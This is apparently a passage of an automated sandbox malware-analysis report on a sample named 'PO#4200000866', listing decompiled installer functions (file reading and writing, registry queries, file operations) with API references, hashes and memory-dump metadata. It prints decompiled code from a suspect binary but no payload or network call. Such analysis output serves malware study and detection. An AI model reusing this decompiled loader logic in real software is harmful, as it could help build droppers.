                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: f3b215bb432605a10a609e61348384089625d0b65b211fc5761fd177cab3f6aa
                                                                                      • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                      • Opcode Fuzzy Hash: f3b215bb432605a10a609e61348384089625d0b65b211fc5761fd177cab3f6aa
                                                                                      • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004022FF(void* __eflags) {
                                                                                      				WCHAR* _t34;
                                                                                      				WCHAR* _t37;
                                                                                      				WCHAR* _t39;
                                                                                      				void* _t41;
                                                                                      
                                                                                      				_t39 = E00402DA6(_t34);
                                                                                      				_t37 = E00402DA6(0x11);
                                                                                      				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
                                                                                      				if(E0040699E(_t39) != 0) {
                                                                                      					 *(_t41 - 0x70) =  *(_t41 - 8);
                                                                                      					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
                                                                                      					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
                                                                                      					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
                                                                                      					_t27 =  *((intOrPtr*)(_t41 + 8));
                                                                                      					 *(_t41 - 0x68) = _t39;
                                                                                      					 *(_t41 - 0x64) = _t37;
                                                                                      					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
                                                                                      					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
                                                                                      					E004056CA(_t34, _t27);
                                                                                      					if(SHFileOperationW(_t41 - 0x70) != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      				} else {
                                                                                      					L1:
                                                                                      					E004056CA(0xfffffff9, _t34); // executed
                                                                                      					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t41 - 4));
                                                                                      				return 0;
                                                                                      			}







                                                                                      0x00402307
                                                                                      0x00402310
                                                                                      0x00402318
                                                                                      0x00402322
                                                                                      0x00402335
                                                                                      0x00402338
                                                                                      0x00402345
                                                                                      0x0040234f
                                                                                      0x00402354
                                                                                      0x0040235d
                                                                                      0x00402360
                                                                                      0x00402363
                                                                                      0x00402366
                                                                                      0x0040236a
                                                                                      0x0040237b
                                                                                      0x00000000
                                                                                      0x00402381
                                                                                      0x00402324
                                                                                      0x00402324
                                                                                      0x00402327
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                        • Part of subcall function 0040699E: FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0), ref: 004069A9
                                                                                        • Part of subcall function 0040699E: FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                      • lstrlenW.KERNEL32 ref: 0040233F
                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0040234A
                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 8a6452b9e45ddfe9618a38267a6d499c2f9138f2126ee8ea4b4bb93aa283f26d
                                                                                      • Instruction ID: efe7ca38dbb9f63e5b96a486a7b13937429123450804d9b7efa9de18d425087e
                                                                                      • Opcode Fuzzy Hash: 8a6452b9e45ddfe9618a38267a6d499c2f9138f2126ee8ea4b4bb93aa283f26d
                                                                                      • Instruction Fuzzy Hash: 7A117071900318AADB10EFF9CA49E9EB6F8BF04344F10443BE505F72D1E6B9C8548B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x0040620e
                                                                                      0x0040621e
                                                                                      0x00406226
                                                                                      0x00000000
                                                                                      0x0040622d
                                                                                      0x00000000
                                                                                      0x0040622f

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00410F70,pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_,00403579,pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_,00410F70,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                      Strings
                                                                                      • pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_, xrefs: 0040620A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID: pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_
                                                                                      • API String ID: 3934441357-3612492708
                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x004061df
                                                                                      0x004061ef
                                                                                      0x004061f7
                                                                                      0x00000000
                                                                                      0x004061fe
                                                                                      0x00000000
                                                                                      0x00406200

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                      Strings
                                                                                      • pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_, xrefs: 004061DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID: pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_
                                                                                      • API String ID: 2738559852-3612492708
                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E00406454(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}






                                                                                      0x004064df
                                                                                      0x004064e6
                                                                                      0x004064f9
                                                                                      0x00000000
                                                                                      0x004064f9
                                                                                      0x004064ea
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422728,?,('B,00406563,('B,00000000,?,?,Call,?), ref: 004064F9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID: ('B
                                                                                      • API String ID: 71445658-2332581011
                                                                                      • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                      • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                      • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                      • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
                                                                                      				long _v8;
                                                                                      				long _t21;
                                                                                      				long _t22;
                                                                                      				void* _t24;
                                                                                      				long _t26;
                                                                                      				int _t27;
                                                                                      				long _t28;
                                                                                      				void* _t30;
                                                                                      				long _t31;
                                                                                      				long _t32;
                                                                                      				long _t36;
                                                                                      
                                                                                      				_t21 = _a4;
                                                                                      				if(_t21 >= 0) {
                                                                                      					_t32 = _t21 +  *0x42a2b8;
                                                                                      					 *0x420ef4 = _t32;
                                                                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                      				}
                                                                                      				_t22 = E00403479(4);
                                                                                      				if(_t22 >= 0) {
                                                                                      					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                                      					if(_t24 == 0) {
                                                                                      						L18:
                                                                                      						_push(0xfffffffd);
                                                                                      						goto L19;
                                                                                      					} else {
                                                                                      						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                      						_t36 = E00403479(_a4);
                                                                                      						if(_t36 < 0) {
                                                                                      							L21:
                                                                                      							_t22 = _t36;
                                                                                      						} else {
                                                                                      							if(_a12 != 0) {
                                                                                      								_t26 = _a4;
                                                                                      								if(_t26 >= _a16) {
                                                                                      									_t26 = _a16;
                                                                                      								}
                                                                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                      								if(_t27 != 0) {
                                                                                      									_t36 = _v8;
                                                                                      									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									goto L18;
                                                                                      								}
                                                                                      							} else {
                                                                                      								if(_a4 <= 0) {
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									while(1) {
                                                                                      										_t28 = _a4;
                                                                                      										if(_a4 >= 0x4000) {
                                                                                      											_t28 = 0x4000;
                                                                                      										}
                                                                                      										_v8 = _t28;
                                                                                      										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
                                                                                      											goto L18;
                                                                                      										}
                                                                                      										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                                      										if(_t30 == 0) {
                                                                                      											_push(0xfffffffe);
                                                                                      											L19:
                                                                                      											_pop(_t22);
                                                                                      										} else {
                                                                                      											_t31 = _v8;
                                                                                      											_a4 = _a4 - _t31;
                                                                                      											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                      											_t36 = _t36 + _t31;
                                                                                      											if(_a4 > 0) {
                                                                                      												continue;
                                                                                      											} else {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      										}
                                                                                      										goto L22;
                                                                                      									}
                                                                                      									goto L18;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				L22:
                                                                                      				return _t22;
                                                                                      			}














                                                                                      0x00403375
                                                                                      0x0040337e
                                                                                      0x00403387
                                                                                      0x0040338b
                                                                                      0x00403396
                                                                                      0x00403396
                                                                                      0x0040339e
                                                                                      0x004033a5
                                                                                      0x004033b7
                                                                                      0x004033be
                                                                                      0x00403463
                                                                                      0x00403463
                                                                                      0x00000000
                                                                                      0x004033c4
                                                                                      0x004033c7
                                                                                      0x004033d3
                                                                                      0x004033d7
                                                                                      0x00403471
                                                                                      0x00403471
                                                                                      0x004033dd
                                                                                      0x004033e0
                                                                                      0x0040343f
                                                                                      0x00403445
                                                                                      0x00403447
                                                                                      0x00403447
                                                                                      0x00403459
                                                                                      0x00403461
                                                                                      0x00403468
                                                                                      0x0040346b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033e2
                                                                                      0x004033e5
                                                                                      0x00000000
                                                                                      0x004033eb
                                                                                      0x004033f0
                                                                                      0x004033f7
                                                                                      0x004033fa
                                                                                      0x004033fc
                                                                                      0x004033fc
                                                                                      0x00403409
                                                                                      0x00403413
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040341c
                                                                                      0x00403423
                                                                                      0x0040343b
                                                                                      0x00403465
                                                                                      0x00403465
                                                                                      0x00403425
                                                                                      0x00403425
                                                                                      0x00403428
                                                                                      0x0040342b
                                                                                      0x00403431
                                                                                      0x00403437
                                                                                      0x00000000
                                                                                      0x00403439
                                                                                      0x00000000
                                                                                      0x00403439
                                                                                      0x00403437
                                                                                      0x00000000
                                                                                      0x00403423
                                                                                      0x00000000
                                                                                      0x004033f0
                                                                                      0x004033e5
                                                                                      0x004033e0
                                                                                      0x004033d7
                                                                                      0x004033be
                                                                                      0x00403473
                                                                                      0x00403476

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                      • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                      • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                      • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E0040252A(int* __ebx, char* __edi) {
                                                                                      				void* _t17;
                                                                                      				short* _t18;
                                                                                      				void* _t35;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      
                                                                                      				_t33 = __edi;
                                                                                      				_t27 = __ebx;
                                                                                      				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                      				_t35 = _t17;
                                                                                      				_t18 = E00402DA6(0x33);
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t35 == __ebx) {
                                                                                      					 *(_t37 - 4) = 1;
                                                                                      				} else {
                                                                                      					 *(_t37 - 0x10) = 0x800;
                                                                                      					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                      						L7:
                                                                                      						 *_t33 = _t27;
                                                                                      						 *(_t37 - 4) = 1;
                                                                                      					} else {
                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                      							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                      							E004065AF(__edi,  *__edi);
                                                                                      						} else {
                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                      								_t33[0x7fe] = _t27;
                                                                                      							} else {
                                                                                      								goto L7;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t35);
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x0040252a
                                                                                      0x0040252a
                                                                                      0x0040252f
                                                                                      0x00402536
                                                                                      0x00402538
                                                                                      0x0040253f
                                                                                      0x00402542
                                                                                      0x0040292e
                                                                                      0x00402548
                                                                                      0x0040254b
                                                                                      0x00402566
                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x00402599
                                                                                      0x00402568
                                                                                      0x0040256c
                                                                                      0x00402585
                                                                                      0x0040258c
                                                                                      0x0040258f
                                                                                      0x0040256e
                                                                                      0x00402571
                                                                                      0x0040257c
                                                                                      0x004025f5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402571
                                                                                      0x0040256c
                                                                                      0x004025fc
                                                                                      0x004025fd
                                                                                      0x004025fd
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsdFF63.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                                                      • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                      • Opcode Fuzzy Hash: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                                                      • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E00401389(signed int _a4, struct HWND__* _a10) {
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				signed int _t11;
                                                                                      				void* _t12;
                                                                                      				signed int _t16;
                                                                                      				signed int _t17;
                                                                                      
                                                                                      				_t17 = _a4;
                                                                                      				while(_t17 >= 0) {
                                                                                      					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                      					if( *_t6 == 1) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_push(_t6); // executed
                                                                                      					_t8 = E00401434(); // executed
                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                      						return 0x7fffffff;
                                                                                      					}
                                                                                      					_t10 = E0040136D(_t8);
                                                                                      					if(_t10 != 0) {
                                                                                      						_t11 = _t10 - 1;
                                                                                      						_t16 = _t17;
                                                                                      						_t17 = _t11;
                                                                                      						_t12 = _t11 - _t16;
                                                                                      					} else {
                                                                                      						_t12 = _t10 + 1;
                                                                                      						_t17 = _t17 + 1;
                                                                                      					}
                                                                                      					if(_a10 != 0) {
                                                                                      						 *0x42924c =  *0x42924c + _t12;
                                                                                      						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}










                                                                                      0x0040138a
                                                                                      0x004013fa
                                                                                      0x0040139b
                                                                                      0x004013a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004013a2
                                                                                      0x004013a3
                                                                                      0x004013ad
                                                                                      0x00000000
                                                                                      0x00401404
                                                                                      0x004013b0
                                                                                      0x004013b7
                                                                                      0x004013bd
                                                                                      0x004013be
                                                                                      0x004013c0
                                                                                      0x004013c2
                                                                                      0x004013b9
                                                                                      0x004013b9
                                                                                      0x004013ba
                                                                                      0x004013ba
                                                                                      0x004013c9
                                                                                      0x004013cb
                                                                                      0x004013f4
                                                                                      0x004013f4
                                                                                      0x004013c9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
